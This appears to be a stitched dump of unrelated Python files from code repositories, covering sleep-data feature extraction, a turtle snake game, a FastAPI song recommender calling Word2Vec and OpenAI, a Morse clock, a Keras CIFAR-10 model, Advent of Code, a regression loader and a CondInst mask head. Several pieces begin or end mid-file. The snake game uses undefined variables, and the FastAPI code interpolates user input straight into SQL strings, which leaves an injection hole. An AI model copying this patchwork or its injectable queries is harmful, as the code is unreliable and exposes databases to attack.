sum_sleep_raw.loc[eid,f'complete_days_starting_0h'] = (data_raw.groupby(pd.Grouper(freq='24h', label='left')).size() >= thr).sum() # remove first and last day and all incomplete ones
sum_sleep_raw.loc[eid,f'complete_days_starting_7h'] = (data_raw.groupby(pd.Grouper(freq='24h', offset='7h',label='left')).size() >= thr).sum() # remove first and last day and all incomplete ones
data_full = data_raw.groupby(pd.Grouper(freq='24h', label='left')).filter(lambda x: len(x) >= thr )
data_full_10h = data_raw.groupby(pd.Grouper(freq='24h', offset='10h',label='left')).filter(lambda x: len(x) >=thr )
data_full_7h = data_raw.groupby(pd.Grouper(freq='24h', offset='7h',label='left')).filter(lambda x: len(x) >= thr )
for cl in classes:
#sum_sleep_raw.loc[eid,f'total_{cl}_hours'] = data[cl].sum() # invalid as biased by how long people wore it
# data recorded in 30sec intervals where then label is given
# to get hours of sleep per day, we have to sum 30sec labels per day and divide by 60*2 # remove first and last day
sum_sleep_raw.loc[eid,f'mean_{cl}_hours_perday'] = (data_full.groupby([data_full.index.date])[cl].sum()/120).mean()
sum_sleep_raw.loc[eid,f'std_{cl}_hours_perday'] = (data_full.groupby([data_full.index.date])[cl].sum()/120).std()
# instead use 24h intervals from first 10h to last 10h
sum_sleep_raw.loc[eid,f'mean_{cl}_hours_per24h'] = (data_full_10h.groupby(pd.Grouper(freq='24h', offset='10h', label='left'))[cl].sum()/120).mean()
sum_sleep_raw.loc[eid,f'std_{cl}_hours_per24h'] = (data_full_10h.groupby(pd.Grouper(freq='24h', offset='10h', label='left'))[cl].sum()/120).std()
sum_sleep_raw.loc[eid,f'mean_movement_during_{cl}'] = data_raw.loc[data_raw[cl]>0,'acc'].mean()
sum_sleep_raw.loc[eid,f'std_movement_during_{cl}'] = data_raw.loc[data_raw[cl]>0,'acc'].std()
# how often wake up during sleep
# identify sleep window and count
data_raw[f'consec_{cl}'] = data_raw[cl] * (data_raw.groupby((data_raw[cl] != data_raw[cl].shift()).cumsum()).cumcount() + 1)
data_full[f'consec_{cl}'] = data_full[cl] * (data_full.groupby((data_full[cl] != data_full[cl].shift()).cumsum()).cumcount() + 1)
data_full_10h[f'consec_{cl}'] = data_full_10h[cl] * (data_full_10h.groupby((data_full_10h[cl] != data_full_10h[cl].shift()).cumsum()).cumcount() + 1)
data_full_7h[f'consec_{cl}'] = data_full_7h[cl] * (data_full_7h.groupby((data_full_7h[cl] != data_full_7h[cl].shift()).cumsum()).cumcount() + 1)
sum_sleep_raw.loc[eid,f'mean_max_{cl}_hours_consecutive_perday'] = (data_full.groupby(pd.Grouper(freq='24h',label='left'))[f'consec_{cl}'].max()/120).mean()
sum_sleep_raw.loc[eid,f'mean_max_{cl}_hours_consecutive_per24h'] = (data_full_10h.groupby(pd.Grouper(freq='24h', offset='10h', label='left'))[f'consec_{cl}'].max()/120).mean()
sum_sleep_raw.loc[eid,f'max_{cl}_hours_consecutive'] = data_raw[f'consec_{cl}'].max()/120
# how often asleep during 24h?
data_raw[f'starts_{cl}'] = data_raw[f'consec_{cl}'] == 1
data_full[f'starts_{cl}'] = data_full[f'consec_{cl}'] == 1
data_full_10h[f'starts_{cl}'] = data_full_10h[f'consec_{cl}'] == 1
data_full_7h[f'starts_{cl}'] = data_full_7h[f'consec_{cl}'] == 1
sum_sleep_raw.loc[eid,f'mean_N_{cl}_intervals_per24h'] = (data_full_10h.groupby(pd.Grouper(freq='24h', offset='10h', label='left'))[f'starts_{cl}'].sum()).mean()
sum_sleep_raw.loc[eid,f'mean_N_{cl}_intervals_perday'] = (data_full.groupby(pd.Grouper(freq='24h', label='left'))[f'starts_{cl}'].sum()).mean()
# how often nap during day?
sum_sleep_raw.loc[eid,f'mean_N_{cl}_intervals_22-10'] = (data_full_10h.groupby(pd.Grouper(freq='12h', offset='10h', label='left'))[f'starts_{cl}'].sum())[1::2].mean()
# how often awake during night?
sum_sleep_raw.loc[eid,f'mean_N_{cl}_intervals_10-22'] = (data_full_10h.groupby(pd.Grouper(freq='12h', offset='10h', label='left'))[f'starts_{cl}'].sum())[::2].mean()
# alternative definition of day/night
# as recording starts at 10am and ends at 10am, need to cutoff incomplete ones
sum_sleep_raw.loc[eid,f'mean_N_{cl}_intervals_23-07'] = (data_full_7h.groupby(pd.Grouper(freq='8h', offset='7h', label='left'))[f'starts_{cl}'].sum())[2::3].mean()
first_8h = data_full_7h.groupby(pd.Grouper(freq='8h', offset='7h', label='left'))[f'starts_{cl}'].sum()[::3]
second_8h = data_full_7h.groupby(pd.Grouper(freq='8h', offset='7h', label='left'))[f'starts_{cl}'].sum()[1::3]
sum_sleep_raw.loc[eid,f'mean_N_{cl}_intervals_07-23'] = (first_8h.values + second_8h.values).mean()
# acceleration shortly before waking up
# select 2min (4 instances) before last sleep label and calculate acc mean
print(sum_sleep_raw.describe())
sum_sleep_raw.to_csv(f'/scratch/c.c21013066/data/ukbiobank/phenotypes/accelerometer/allsubject25_summary_from_raw.csv')
#sum_sleep_raw.to_csv(f'/scratch/c.c21013066/data/ukbiobank/phenotypes/accelerometer/allsubject{index}_summary_from_raw.csv')
#sum_sleep_raw.to_csv(f'{folder}/summary_fromraw.csv')
#sum_sleep_raw.to_csv(f'/scratch/scw1329/annkathrin/data/ukbiobank/accelerometer/to_process3/summary_fromraw.csv') | aschalkamp/UKBBprodromalPD | analyses/1_download_preprocess/feature_extraction_parallel.py | feature_extraction_parallel.py | py | 8,395 | python | en | code | 8 | github-code | 90 |
14227552248 | #
# Imports
#
import os
from turtle import Turtle, Screen
import time
#
# Classes
#
#
# Global variables
#
#
# Private functions
#
# clear_console
def clear_console():
"""
Clears console.
"""
command = "clear"
if os.name in ("nt", "dos"): # If Machine is running on Windows, use cls
command = "cls"
os.system(command)
#
# main
#
if __name__ == "__main__":
# Clear console
clear_console()
#
# Screen
#
# Create Screen
screen = Screen()
# Configure Height and Width
screen.setup(width=600, height=600)
# Configure backgroud colour
screen.bgcolor("black")
# Configure window title
screen.title("Snakey")
#
# Snake
#
game_is_on = True
# Step 1: Create three turtles being squares, that's the snake
# Hard way:
# segment_1 = Turtle("square")
# segment_1.color("white")
# segment_2 = Turtle("square")
# segment_2.color("white")
# segment_2.goto(x=-20, y=0)
# segment_3 = Turtle("square")
# segment_3.color("white")
# segment_3.goto(x=-40, y=0)
# Easy way
for position in starting_positions:
# Create turtle
new_segment = Turtle("square")
# Change colour
new_segment.color("white")
# Pen up
new_segment.penup()
# Move turtle
new_segment.goto(position)
# Add to turtles list
segments.append(new_segment)
while game_is_on:
# Update graphics
screen.update()
# Delay
time.sleep(0.1)
# Step 2: Move our snakey forward
# for seg_num in range(start=2, stop=0, range=-1):
for seg_num in range(len(segments) - 1, 0, -1):
# Replace second to last segment with last segment
segments[seg_num].goto(
segments[seg_num - 1].xcor(), segments[seg_num - 1].ycor()
)
# Move first segment
segments[0].forward(20)
# Exit screen
screen.exitonclick()
| fjpolo/Udemy100DaysOfCodeTheCompletePyhtonProBootcamp | Day020_021/main001.py | main001.py | py | 2,097 | python | en | code | 8 | github-code | 90 |
41153212150 | from fastapi import FastAPI
from gensim.models import Word2Vec
from pydantic import BaseModel
import logging
import json
from typing import List
from databases import Database
import os
import openai
import re
## 만들 함수
app = FastAPI()
logging.basicConfig(level=logging.INFO)
loaded_word2vec_model = Word2Vec.load('song2vec.model')
@app.get("/")
async def root():
return {"message": "Hello World"}
class InputData(BaseModel):
input_data: List[str]
# 1. DB 접근 (DTO)
# 데이터베이스 연결 URL 설정
fast_dir = os.path.abspath(os.path.join(os.path.dirname(__file__),"..",".."))
secrets_path = os.path.join(fast_dir,"secrets.json")
with open(secrets_path, 'r') as f:
secrets = json.load(f)
DATABASE_URL = secrets["DATABASE_URL"]
# gpt api
openai.organization = secrets["openai.organization"]
openai.api_key = secrets["openai.api_key"]
# 기본 데이터베이스 객체 생성
database = Database(DATABASE_URL)
@app.on_event("startup")
async def startup():
await database.connect()
@app.on_event("shutdown")
async def shutdown():
await database.disconnect()
# @app.get("/test_db_connection")
# async def test_db_connection():
# # 데이터가 있는지 확인하려면 실제 테이블 이름으로 교체하세요.
# query = 'SELECT song_song.tj_song_num_id,song_song.ky_song_num_id,song_song.title,song_song.artist FROM song_song WHERE master_number = 21'
# try:
# result = await database.fetch_one(query)
# if result is not None:
# return {"status": "success", "data": result}
# else:
# return {"status": "success", "data": "No rows found"}
# except Exception as e:
# return {"status": "error", "details": str(e)}
def record_to_dict(record):
return {
"tj_song_num_id": record["tj_song_num_id"],
"ky_song_num_id": record["ky_song_num_id"],
"title": record["title"],
"artist": record["artist"]
}
@app.post("/process")
async def process_data(input_data: InputData):
logging.info(f"Received data: {input_data}")
print(f"Received data: {input_data.input_data}")
print(f"Received data type: {type(input_data)}")
filtered_input_data = [word for word in input_data.input_data if word in loaded_word2vec_model.wv]
if len(filtered_input_data) == 0:
result_list = []
for i in input_data.input_data:
query = f'SELECT song_song.tj_song_num_id,song_song.ky_song_num_id,song_song.title,song_song.artist FROM song_song WHERE master_number = {int(i)};'
rows = await database.fetch_all(query=query)
logging.info(f"comfirm: {rows}")
for row in rows:
song_title = row["title"]
artist = row["artist"]
result_list.append(f"{song_title}-{artist}")
print(result_list)
prompt = f"내 플레이리스트는 {result_list}이고, 내 플레이리스트 기반으로 부를 노래를 노래방에 있는 노래.가수 형식 10곡 추천해줘"
response = openai.Completion.create(
engine="text-davinci-003",
prompt=prompt,
temperature=0.5,
max_tokens=1024,
n=1,
stop=None,
)
# print(response.choices[0].text.strip())
song_info = response.choices[0].text.strip().split('\n')
print(song_info)
collected_rows = []
for song in song_info:
song = re.sub(r'\d+\.','', song)
title,_=song.split('-')
title = title.replace(" ","").strip()
print(title)
try:
query = f"SELECT song_song.tj_song_num_id,song_song.ky_song_num_id,song_song.title,song_song.artist FROM song_song WHERE song_song.title = '{title}' LIMIT 1;"
data = await database.fetch_one(query=query)
collected_rows.append(data)
except Exception as error:
print(f"Error for title '{i}': {error}")
continue
# 여기에 모델 고도화 작업 ex) chatGPTapi,코사인유사도 뻥튀기
print("필터링된 데이터가 없어 chat gpt가 응답합니다.")
return {"result": collected_rows}
else:
similar_songs = loaded_word2vec_model.wv.most_similar(positive=filtered_input_data, topn=10)
result = [i[0] for i in similar_songs]
print(result)
# 결과를 수집할 빈 리스트 생성
collected_rows = []
for i in result:
query = f'SELECT song_song.tj_song_num_id,song_song.ky_song_num_id,song_song.title,song_song.artist FROM song_song WHERE master_number = {int(i)};'
rows = await database.fetch_all(query=query) # 변경된 부분
print(rows)
# 결과를 collected_rows 리스트에 추가
collected_rows.extend(rows)
return {"result": collected_rows}
| OhJune/Client-Django-FastAPI | FastAPI/app/main.py | main.py | py | 5,001 | python | en | code | 1 | github-code | 90 |
42323378370 | def morse_time(time_string):
t = ''.join([i.zfill(2) for i in time_string.split(":")])
y = [2, 4, 3, 4, 3, 4]
x = [bin(int(t[i]))[2:].zfill(y[i]).replace('0','.').replace('1','-') for i in range(6)]
return "%s %s : %s %s : %s %s" % (x[0],x[1],x[2],x[3],x[4],x[5])
if __name__ == '__main__':
# These "asserts" using only for self-checking and not necessary for auto-testing
assert morse_time("10:37:49") == ".- .... : .-- .--- : -.. -..-", "First Test"
assert morse_time("21:34:56") == "-. ...- : .-- .-.. : -.- .--.", "Second Test"
assert morse_time("00:1:02") == ".. .... : ... ...- : ... ..-.", "Third Test"
assert morse_time("23:59:59") == "-. ..-- : -.- -..- : -.- -..-", "Fourth Test"
print("Coding complete? Click 'Check' to review your tests and earn cool rewards!")
| rawgni/empireofcode | morse_clock.py | morse_clock.py | py | 822 | python | en | code | 0 | github-code | 90 |
8580456839 | import os
from pprint import pprint
from datetime import datetime
def convert2ampm(time24: str) -> str:
return datetime.strptime(time24, '%H:%M').strftime('%I:%M%p')
os.chdir('D:\Learn/Python/buzzdata')
with open('buzzers.csv') as data:
ignore = data.readline #игнорировать заголовок
flights = {} #создать пустой словарь
for line in data:
k, v = line.strip().split(',')
flights[k] = v
#pprint(flights)
flights2 = {}
for k, v in flights.items(): #метод items возвращает элекменты словаря по одному
flights2[convert2ampm(k)] = v.title()
#pprint(flights2)
more_flights = {} #генератор словарей
more_flights = {convert2ampm(k): v.title() for k, v in flights.items()}
#pprint(more_flights)
just_freeport2 = {convert2ampm(k): v.title()
for k, v in flights.items()
if v == 'FREEPORT'}
#pprint(just_freeport2)
data = [ 1, 2, 3, 4, 5, 6, 7, 8 ]
evens = [num
for num in data
if not num % 2]
data = [ 1, 'one', 2, 'two', 3, 'three', 4, 'four' ]
words = [num for num in data if isinstance(num, str)]
data = list('So long and thanks for all the fish'.split())
title = [word.title() for word in data]
when = {}
for dest in set(flights.values()):
when[dest] = [k for k, v in flights.items() if v == dest]
when2 = {dest: [k for k, v in flights.items() if v == dest] for dest in set(flights.values())}
pprint(when2)
| Ve1l/python_book | test_format_csv.py | test_format_csv.py | py | 1,532 | python | en | code | 1 | github-code | 90 |
27709670916 |
# coding: utf-8
# In[ ]:
import keras
from keras.datasets import cifar10
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras.layers import Convolution2D, MaxPooling2D
from keras.layers.convolutional import MaxPooling2D
from keras.optimizers import SGD
from keras.utils import np_utils
import matplotlib.pyplot as plt
import os
import numpy as np
batch_size = 32
num_classes = 10
epochs = 1
num_predictions = 20
save_dir = os.path.join(os.getcwd(), 'saved_models')
model_name = 'keras_cifar10_trained_model.h5'
(X_train, y_train), (X_test, y_test) = cifar10.load_data()
print("Training data:")
print( "Number of examples: ", X_train.shape[0])
print( "Number of channels:",X_train.shape[3] )
print( "Image size:", X_train.shape[1], X_train.shape[2])
print("\n")
print( "Test data:")
print( "Number of examples:", X_test.shape[0])
print( "Number of channels:", X_test.shape[3])
print( "Image size:",X_test.shape[1], X_test.shape[2])
plot = []
for i in range(1,10):
plot_image = X_train[100*i,:,:,:]
for j in range(1,10):
plot_image = np.concatenate((plot_image, X_train[100*i+j,:,:,:]), axis=1)
if i==1:
plot = plot_image
else:
plot = np.append(plot, plot_image, axis=0)
print(plot.shape, np.max(plot), np.min(plot))
plt.imshow(plot/255)
plt.axis('off')
plt.show()
print("mean before normalization:", np.mean(X_train))
print("std before normalization:", np.std(X_train))
mean=[0,0,0]
std=[0,0,0]
newX_train = np.ones(X_train.shape)
newX_test = np.ones(X_test.shape)
for i in range(3):
mean[i] = np.mean(X_train[:,:,:,i])
std[i] = np.std(X_train[:,:,:,i])
for i in range(3):
newX_train[:,:,:,i] = X_train[:,:,:,i] - mean[i]
newX_train[:,:,:,i] = newX_train[:,:,:,i] / std[i]
newX_test[:,:,:,i] = X_test[:,:,:,i] - mean[i]
newX_test[:,:,:,i] = newX_test[:,:,:,i] / std[i]
X_train = newX_train
X_test = newX_test
print("mean after normalization:", np.mean(X_train))
print("std after normalization:", np.std(X_train))
batchSize = 50 #-- Training Batch Size
num_classes = 10 #-- Number of classes in CIFAR-10 dataset
num_epochs = 10 #-- Number of epochs for training
learningRate= 0.001 #-- Learning rate for the network
lr_weight_decay = 0.95 #-- Learning weight decay. Reduce the learn rate by 0.95 after epoch
img_rows, img_cols = 32, 32 #-- input image dimensions
Y_train = np_utils.to_categorical(y_train, num_classes)
Y_test = np_utils.to_categorical(y_test, num_classes)
model = Sequential() #-- Sequential container.
model.add(Convolution2D(6, 5, 5, #-- 6 outputs (6 filters), 5x5 convolution kernel
border_mode='valid',
input_shape=( img_rows, img_cols, 3))) #-- 3 input depth (RGB)
model.add(Activation('relu')) #-- ReLU non-linearity
# model.add(Convolution2D(8, 5, 5)) #-- 16 outputs (16 filters), 5x5 convolution kernel
# model.add(Activation('relu')) #-- ReLU non-linearity
model.add(MaxPooling2D(pool_size=(2, 2)))
#-- A max-pooling on 2x2 windows
model.add(Convolution2D(16, 5, 5)) #-- 16 outputs (16 filters), 5x5 convolution kernel
model.add(Activation('relu')) #-- ReLU non-linearity
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Convolution2D(26, 5, 5)) #-- 26 outputs (16 filters), 5x5 convolution kernel
# model.add(Activation('relu')) #-- ReLU non-linearity
# model.add(MaxPooling2D(pool_size=(2, 2)))
# #-- A max-pooling on 2x2 windows
model.add(Flatten()) #-- eshapes a 3D tensor of 16x5x5 into 1D tensor of 16*5*5
model.add(Dense(120)) #-- 120 outputs fully connected layer
model.add(Activation('relu')) #-- ReLU non-linearity
model.add(Dense(84)) #-- 84 outputs fully connected layer
model.add(Activation('relu')) #-- ReLU non-linearity
model.add(Dense(num_classes)) #-- 10 outputs fully connected layer (one for each class)
model.add(Activation('softmax')) #-- converts the output to a log-probability. Useful for classification problems
print(model.summary())
sgd = SGD(lr=learningRate, decay = lr_weight_decay)
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
#-- switch verbose=0 if you get error "I/O operation from closed file"
history = model.fit(X_train, Y_train, batch_size=batchSize, epochs=num_epochs,
verbose=1, shuffle=True, validation_data=(X_test, Y_test))
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
#-- summarize history for loss
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
score = model.evaluate(X_test, Y_test, verbose=0)
print('Test score:', score[0])
print('Test accuracy:', score[1])
| sathisceg/Neural-network | problem_1_2_m.py | problem_1_2_m.py | py | 5,838 | python | en | code | 1 | github-code | 90 |
17079310013 | import aoc
ROCK = "A"
PAPER = "B"
SCISSOR = "C"
def getOutcome(myMove, opponentMove):
if myMove == opponentMove:
return 3
if myMove == ROCK and opponentMove == SCISSOR:
return 6
if myMove == SCISSOR and opponentMove == PAPER:
return 6
if myMove == PAPER and opponentMove == ROCK:
return 6
return 0
def getScore(myMove, opponentMove):
score = 0
if myMove == ROCK:
score += 1
if myMove == PAPER:
score += 2
if myMove == SCISSOR:
score += 3
score += getOutcome(myMove, opponentMove)
return score
def translateMySymbolPart1(mySymbol):
translateDict = dict(X="A", Y="B", Z="C")
return translateDict[mySymbol]
def translateMySymbolPart2(mySymbol, opponentMove):
if mySymbol == "Y":
return opponentMove
if mySymbol == "X":
loseDict = dict(A="C", B="A", C="B")
return loseDict[opponentMove]
if mySymbol == "Z":
winDict = dict(A="B", B="C", C="A")
return winDict[opponentMove]
data = aoc.getLinesForDay(2)
cumulativeSum1 = 0
cumulativeSum2 = 0
for line in data:
[opponentMove, mySymbol] = line.split(" ")
myMove1 = translateMySymbolPart1(mySymbol)
cumulativeSum1 += getScore(myMove1, opponentMove)
myMove2 = translateMySymbolPart2(mySymbol, opponentMove)
print(myMove2, opponentMove)
cumulativeSum2 += getScore(myMove2, opponentMove)
print("Part 1", cumulativeSum1)
print("Part 2", cumulativeSum2)
# Part 2 10318 too low (swapped the order of winDict and loseDict)
| tchapeaux/advent-of-code-2022 | day02.py | day02.py | py | 1,562 | python | en | code | 0 | github-code | 90 |
18271095839 | import sys
sys.setrecursionlimit(2147483647)
INF=float("inf")
MOD=10**9+7 # 998244353
input=lambda:sys.stdin.readline().rstrip()
def resolve():
just, less = 0, INF
for d in input()[::-1]:
d = int(d)
njust = min(just + d, less + d + 1)
nless = min(just + (10-d), less + (9-d))
just, less = njust, nless
print(min(just, less + 1))
resolve() | Aasthaengg/IBMdataset | Python_codes/p02775/s323686619.py | s323686619.py | py | 382 | python | en | code | 0 | github-code | 90 |
34813172674 | import torch
from torch.nn import functional as F
from torch import nn
from .comm import compute_locations, aligned_bilinear
def dice_coefficient(x, target):
eps = 1e-5
n_inst = x.size(0)
x = x.reshape(n_inst, -1)
target = target.reshape(n_inst, -1)
intersection = (x * target).sum(dim=1)
union = (x ** 2.0).sum(dim=1) + (target ** 2.0).sum(dim=1) + eps
loss = 1. - (2 * intersection / union)
return loss
def parse_dynamic_params(params, channels, weight_nums, bias_nums):
assert params.dim() == 2
assert len(weight_nums) == len(bias_nums)
assert params.size(1) == sum(weight_nums) + sum(bias_nums)
num_insts = params.size(0)
num_layers = len(weight_nums)
params_splits = list(torch.split_with_sizes(
params, weight_nums + bias_nums, dim=1
))
weight_splits = params_splits[:num_layers]
bias_splits = params_splits[num_layers:]
for l in range(num_layers):
if l < num_layers - 1:
# out_channels x in_channels x 1 x 1
weight_splits[l] = weight_splits[l].reshape(num_insts * channels, -1, 1, 1)
bias_splits[l] = bias_splits[l].reshape(num_insts * channels)
else:
# out_channels x in_channels x 1 x 1
weight_splits[l] = weight_splits[l].reshape(num_insts * 1, -1, 1, 1)
bias_splits[l] = bias_splits[l].reshape(num_insts)
return weight_splits, bias_splits
class DynamicMaskHead(nn.Module):
def __init__(self, cfg):
super(DynamicMaskHead, self).__init__()
self.num_layers = cfg.MODEL.CONDINST.MASK_HEAD.NUM_LAYERS
self.channels = cfg.MODEL.CONDINST.MASK_HEAD.CHANNELS
self.in_channels = cfg.MODEL.CONDINST.MASK_BRANCH.OUT_CHANNELS
self.mask_out_stride = cfg.MODEL.CONDINST.MASK_OUT_STRIDE
self.disable_rel_coords = cfg.MODEL.CONDINST.MASK_HEAD.DISABLE_REL_COORDS
soi = cfg.MODEL.CONDINST.SIZES_OF_INTEREST
self.register_buffer("sizes_of_interest", torch.tensor(soi + [soi[-1] * 2]))
weight_nums, bias_nums = [], []
for l in range(self.num_layers):
if l == 0:
if not self.disable_rel_coords:
weight_nums.append((self.in_channels + 2) * self.channels)
else:
weight_nums.append(self.in_channels * self.channels)
bias_nums.append(self.channels)
elif l == self.num_layers - 1:
weight_nums.append(self.channels * 1)
bias_nums.append(1)
else:
weight_nums.append(self.channels * self.channels)
bias_nums.append(self.channels)
self.weight_nums = weight_nums
self.bias_nums = bias_nums
self.num_gen_params = sum(weight_nums) + sum(bias_nums)
self.register_buffer("_iter", torch.zeros([1]))
def mask_heads_forward(self, features, weights, biases, num_insts):
'''
:param features
:param weights: [w0, w1, ...]
:param bias: [b0, b1, ...]
:return:
'''
assert features.dim() == 4
n_layers = len(weights)
x = features
for i, (w, b) in enumerate(zip(weights, biases)):
x = F.conv2d(
x, w, bias=b,
stride=1, padding=0,
groups=num_insts
)
if i < n_layers - 1:
x = F.relu(x)
return x
def mask_heads_forward_with_coords(
self, mask_feats, mask_feat_stride, instances
):
locations = compute_locations(
mask_feats.size(2), mask_feats.size(3),
stride=mask_feat_stride, device=mask_feats.device
)
n_inst = len(instances)
im_inds = instances.im_inds
mask_head_params = instances.mask_head_params
N, _, H, W = mask_feats.size()
if not self.disable_rel_coords:
instance_locations = instances.locations
relative_coords = instance_locations.reshape(-1, 1, 2) - locations.reshape(1, -1, 2)
relative_coords = relative_coords.permute(0, 2, 1).float()
soi = self.sizes_of_interest.float()[instances.fpn_levels.view(-1).long()]
relative_coords = relative_coords / soi.reshape(-1, 1, 1)
relative_coords = relative_coords.to(dtype=mask_feats.dtype)
mask_head_inputs = torch.cat([
relative_coords, mask_feats[im_inds].reshape(n_inst, self.in_channels, H * W)
], dim=1)
else:
mask_head_inputs = mask_feats[im_inds].reshape(n_inst, self.in_channels, H * W)
mask_head_inputs = mask_head_inputs.reshape(1, -1, H, W)
weights, biases = parse_dynamic_params(
mask_head_params, self.channels,
self.weight_nums, self.bias_nums
)
mask_logits = self.mask_heads_forward(mask_head_inputs, weights, biases, n_inst)
mask_logits = mask_logits.reshape(-1, 1, H, W)
assert mask_feat_stride >= self.mask_out_stride
assert mask_feat_stride % self.mask_out_stride == 0
mask_logits = aligned_bilinear(mask_logits, int(mask_feat_stride / self.mask_out_stride))
return mask_logits
def __call__(self, mask_feats, mask_feat_stride, pred_instances, gt_instances=None):
if self.training:
losses = {}
if len(pred_instances) == 0:
dummy_loss = mask_feats.sum() * 0 + pred_instances.mask_head_params.sum() * 0
losses["loss_mask"] = dummy_loss
else:
gt_inds = pred_instances.gt_inds
gt_bitmasks = torch.cat([per_im.gt_bitmasks for per_im in gt_instances if per_im.has("gt_bitmasks")])
gt_bitmasks = gt_bitmasks[gt_inds].unsqueeze(dim=1).to(dtype=mask_feats.dtype)
mask_logits = self.mask_heads_forward_with_coords(
mask_feats, mask_feat_stride, pred_instances
)
mask_scores = mask_logits.sigmoid()
mask_losses = dice_coefficient(mask_scores, gt_bitmasks)
loss_mask = mask_losses.mean()
losses["loss_mask"] = loss_mask
return losses
else:
if len(pred_instances) > 0:
mask_logits = self.mask_heads_forward_with_coords(
mask_feats, mask_feat_stride, pred_instances
)
pred_instances.pred_global_masks = mask_logits.sigmoid()
return pred_instances
def build_dynamic_mask_head(cfg):
return DynamicMaskHead(cfg)
| PeizeSun/OneNet | projects/OneSeg/oneseg/mask_head_dynamic.py | mask_head_dynamic.py | py | 6,648 | python | en | code | 640 | github-code | 90 |
21304415003 | from turtle import color
import cv2 as cv
import numpy as np
from matplotlib import pyplot as plt
#read image
img = cv.imread(r"C:\Users\amora\OneDrive\Documents\Visual Studio Code\Course_Imageproccesing2\photos\group 2.jpg")
#________________________method 1 ______________________________#
plt.hist(img.ravel() , 256 , (0 , 256) )
plt.show()
#________________________method 2 ______________________________#
colors = ['r' , 'g' , 'b']
for i , col in enumerate(colors) :
hist = cv.calcHist([img] , [i] , None , [256] , [0 , 256])
#open new figure
plt.figure()
#make title for graph
plt.title('Histograms')
plt.plot(hist , color = col)
plt.xlim([0 , 256])
plt.show() | es-OmarHani/ImageProcessing_2 | #histograms/histograms.py | histograms.py | py | 702 | python | en | code | 0 | github-code | 90 |
6507397659 | import unittest
import struct
class Test_test1(unittest.TestCase):
def test_A(self):
self.assertEqual(1, 1)
#self.fail("Not implemented")
def test_A2(self):
speed = 1000
speedInBytes = bytes(struct.pack('>h', 1500))
print('{} {}'.format(speedInBytes[0], speedInBytes[1]))
self.assertEqual(1, 1)
#self.fail("Not implemented")
if __name__ == '__main__':
unittest.main()
| Eurostar64/RailuinoSrcp | PythonSrcpServer/test1.py | test1.py | py | 442 | python | en | code | 0 | github-code | 90 |
24772107611 | # Load model parameters to test
import model
import load
import pandas
import numpy as np
import argparse
import train_multiple_models as train_mm
import os
import train
def load_trainer(model_path):
trainer = model.LinearRegression(train=False)
trainer.load_model(model_path)
return trainer
def filter_attributes(data, filename):
with open(filename, 'rb') as f:
booleans = np.load(f)
return data[:,booleans]
def clean_data(data, attributes_filename, data_bounds_filename):
def _check_bound(num, l_bound, r_bound):
return num >= u_bound or num <= l_bound
data_bounds = get_data_bounds(data_bounds_filename)
total_testing_data = data.shape[0]
data = data.reshape(-1, 18)
data, total_attr, PM_index = \
train.filter_attributes(data, attributes_filename)
for attr_index in range(data.shape[1]):
l_bound, u_bound, middle_mean = data_bounds[attr_index]
if attr_index == PM_index:
u_bound = 200
for i in range(data.shape[0]):
if _check_bound(data[i][attr_index], l_bound, u_bound):
if i != 0:
data[i][attr_index] = data[i-1][attr_index]
else:
data[i][attr_index] = middle_mean
return data.reshape(total_testing_data, -1)
def get_data_bounds(filename):
with open(filename, 'rb') as f:
data_bounds = np.load(f)
return data_bounds
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--model_main',
required=True,
help='The training model parameters path,\
this is the main one.')
parser.add_argument('--model_minor',
default=None,
help='The training model parameters path,\
this is the minor one,\
a total of five small models.')
parser.add_argument('-t','--testing_filename',
default='data/test.csv',
help='The testing.csv file path')
parser.add_argument('-o','--output',
default='ans.csv',
help='The output testing prediction filename')
parser.add_argument('--attributes_filename',
default='models/attributes_PM2.5_PM10.npy',
help='The attributes used boolean file')
parser.add_argument('--data_bounds_filename',
default='models/data_bounds.npy',
help='The data bounds used in training,\
required loaded to filter out\
possible invalid data.')
return parser.parse_args()
if __name__ == '__main__':
args = get_args()
main_model_path = args.model_main
trainer = load_trainer(main_model_path)
if args.model_minor is not None:
small_trainer = []
for i in range(8):
small_trainer.append(load_trainer(
os.path.join(args.model_minor, \
'split_%d'%i, 'model_e1000.npy')))
#split_values = [2, 14, 22, 30, 40, 130]
split_values = [2, 14, 22, 30, 40, 60, 80, 100, 130]
test_path = args.testing_filename
testing_data = load.load_test_csv(test_path)
testing_data = clean_data(testing_data,
args.attributes_filename,
args.data_bounds_filename)
output_path = args.output
outputs = [['id', 'value']]
for i in range(testing_data.shape[0]):
test_x = testing_data[i]
prediction = trainer.forward(test_x)
if args.model_minor is not None:
model_index = train_mm.get_split_index(prediction, split_values)
final_prediction = small_trainer[model_index].forward(test_x)
if np.abs(prediction-final_prediction) > 5 or \
prediction < 2 or final_prediction < 2 or\
(test_x.reshape(9,-1)[:,-1] > 89).any():
#print('id_%d, last:[%.1f,%.1f,%.1f], main:%.3f, minor:%.3f' % (i, test_x.reshape(9,-1)[-3,-1], test_x.reshape(9,-1)[-2,-1], test_x.reshape(9,-1)[-1,-1], prediction, final_prediction))
#final_prediction = np.mean(np.concatenate([test_x.reshape(9,-1)[-2:,-1], prediction]))
#print(final_prediction)
final_prediction = np.mean(test_x.reshape(9,-1)[-3:,-1])
else:
final_prediction = np.mean([prediction, final_prediction])
outputs.append(['id_%d' % i, final_prediction])
else:
outputs.append(['id_%d' % i, prediction[0]])
pandas.DataFrame(outputs).to_csv(output_path,
header=False, index=False)
| kaikai4n/ML2018FALL | hw1/hw1.py | hw1.py | py | 4,577 | python | en | code | 1 | github-code | 90 |
8967007147 | import numpy as np
from Sobel import get_image
from PIL import Image, ImageDraw
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from IoU import get_iou, get_iou_dict
import random
class Anchor():
def __init__(self, width, height, x_center, y_center) -> None:
self.w = width
self.h = height
self.x = x_center
self.y = y_center
def get_top_left(self):
